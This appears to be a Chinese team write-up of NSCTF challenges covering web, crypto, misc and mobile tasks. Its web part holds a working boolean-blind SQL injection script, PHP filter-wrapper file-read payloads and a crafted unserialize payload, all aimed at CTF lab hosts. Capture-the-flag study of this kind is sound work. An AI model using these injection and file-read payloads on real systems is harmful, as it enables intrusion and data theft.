前言
只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样
Web
Query
查看源码有hintlogin.php
,然后有显示登录界面
利用万能密码进行登录,有回显
回显是登陆成功
利用脚本进行布尔盲注
import requests
import string
url="http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,999):
print(i)
for j in range(32,128):
# 库名
#s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"
# 表名
#s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"
# 列名
#s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"
s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{i},1))/**/like/**/{j},1,0)#"
data={
'username':s,
'password':1
}
r=requests.post(url,data=data)
if "登录成功" in r.text:
flag+=chr(j)
print(flag)
break
运行脚本得出flag
Deserialization
按f12得到hint
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
include($read);
$input = unserialize($input);
$input2 = clone $input;
$input2->position = "route.php";
}
else{
die("NONONO!");
}
构造payload读取route.php
文件源码
read=php://filter/read=convert.base64-encode/resource=route.php&input=1
base解密得到代码:
<h1>Here can you find the position of the flag!</h1>
<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>
相同方法查看h1nt.php
:
read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
解密得:
<?php
class test
{
public $position;
public function __clone(){
echo file_get_contents($this->position);
return $this->position;
}
}
?>
然后反序列化,使position
的值设置为可以读取f14g.php
的payload
class test
{
public $position ;
public function __construct($position){
$this ->position = $position;
}
public function __clone(){
echo file_get_contents($this->position);
return $this->position;
}
}
$input = new test("php://filter/read=convert.base64-encode/resource=f14g.php");
print (serialize($input).PHP_EOL);
传入参数
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}
base64解密得到flag
CodeCheck
f12得到hint
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}
说明我们要传入a
的文件内容是flag
并且需要让b
的文件内容和c
传入的参数相同
然后传入d,利用include()
函数来读取文件
get传参
http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag&b=data://text/plain,flag&c=flag&d=php://filter/read=convert.base64-encode/resource=index.php
base64解密得到flag
Crypto
secret
e,phi不互素,脚本直接梭
p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e,phi)
t1 = e // t
dt1 = gmpy2.invert(t1,phi)
mt1 = pow(c,dt1,n)
s,m = gmpy2.iroot(mt1,t)
print(long_to_bytes(s))
Morse的笔记本
secret.txt
中是一句话,将标点符号单独取出
。,,。!。,!。。。!。。。!。,,!,,,!。,。!,。。!。。!。。。!,。,。!,,,!,。!,,。!。,。!。,!,!。。。
猜测是摩斯密码,利用在线网站解密
PASSWORDISCONGRATS
,猜测是维吉尼亚密码,将附件中给的密码解密,密钥经过测试是congrats
ciphey解出flag
RSA
在线网站直接分解n-1,得到g
2 * 1346104232461691 *13570850594633462506426369052182298554140635599543685835372377476383038708650421475723391142118956001358520246769650699398490037618758005241062608387057439283872260149565854577827352267289963736282502923131251179400580891491236925451166755184695335564693793568286112036468975877609637392241679
利用脚本解密:
from Crypto.Util.number import inverse, long_to_bytes
g = 1346104232461691
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439
e = 65537
d = inverse(e, (a - 1) * (g - 1))
plaintext = pow(c, d, a * g)
decrypted_message = long_to_bytes(plaintext)
print("Decrypted message:", decrypted_message.decode())
得到flag
Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}
Misc
ZIP
附件为压缩包,要想解密需要密码,但是有hint
The art of 0 and 1, and it will remain shorter than 9.
说明密码只有0和1,并且不超过9位
利用字典生成工具生成字典
然后对压缩包进行字典爆破解密
爆破出密码,得到flag
SimpleDocument
010打开文件,发现PDF文件头
手动分离文件,并且保存为PDF文件
pdf里什么都没有,所以
转化为word文件,改变一下颜色字体,得到flag
Mobile
peacock
1.主逻辑在test内,发现test内部加载了test库
2.找到lib里面的libtest.so文件,使用ida打开
在字符串窗口发现了base64加密的密文以及table